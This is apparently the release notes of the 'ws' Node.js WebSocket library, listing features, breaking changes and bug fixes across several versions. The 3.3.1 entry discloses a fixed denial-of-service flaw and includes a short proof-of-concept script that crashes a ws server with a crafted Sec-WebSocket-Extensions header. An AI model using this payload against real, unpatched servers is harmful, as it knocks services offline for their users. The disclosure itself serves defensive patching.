5.2.0

Features

• Added ability to specify custom headers when rejecting the handshake (#1379).

5.1.1

Bug fixes

• Fixed a regression introduced in 9e152f9 (#1347).

5.1.0

Features

• The address argument of the WebSocket constructor can now be a URL
  instance (#1329).
• The options argument of the WebSocket constructor now accepts any TLS
  option that is also accepted by https.request() (#1332).

5.0.0

Breaking changes

• Dropped support for Node.js < 4.5.0 (#1313).
• The connection is no longer closed if the server does not agree to any of
  the client's requested subprotocols (#1312).
• net.Socket errors are no longer re-emitted (a4050db).

Features

• Read backpressure is now properly handled when permessage-deflate is enabled
  (#1302).

4.1.0

Features

• Added WebSocketServer.prototype.address() (#1294).
• Added zlib{Deflate,Inflate}Options options (#1306).

4.0.0

Breaking changes

• The close status code is now set to 1005 if the received close frame contains
  no status code (a31b1f6).
• Error messages and types have been updated (695c5ea).
• The onerror event handler now receives an ErrorEvent instead of JavaScript
  error (63e275e).
• The third argument of WebSocket.prototype.ping() and
  WebSocket.prototype.pong() is no longer a boolean but an optional callback
  (30c9f71).
• The non-standard protocolVersion and bytesReceived attributes have been
  removed (30c9f71...ee9b5f3).
• The extensions attribute is no longer an object but a string representing
  the extensions selected by the server (fdec524).
• The 'headers' event on the client has been renamed to 'upgrade'. Listeners
  of this event now receive only the response argument (1c783c2).
• The WebSocket.prototype.pause() and WebSocket.prototype.resume() methods
  have been removed to prevent the user from interfering with the state of the
  underlying net.Socket stream (a206e98).

3.3.3

Bug fixes

• net.Socket errors are no longer swallowed (beff620).
• The status code and close reason are now always taken from the close frame if
  received (beff620).

3.3.2

Bug fixes

• The parser of the Sec-WebSocket-Extensions header has been rewritten to make
  it spec-compliant (#1240).

3.3.1

Bug fixes

• Fixed a DoS vulnerability (c4fe466).

A specially crafted value of the Sec-WebSocket-Extensions header that
used Object.prototype property names as extension or parameter names
could be used to make a ws server crash.

const WebSocket = require('ws');
const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor';  // or ',;constructor'

  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});

The vulnerability has been privately reported by Nick Starke and
Ryan Knell of Sonatype Security Research and promptly fixed. Please
update now!

1.1.5

Bug fixes

• Fixed a DoS vulnerability (f8fdcd4).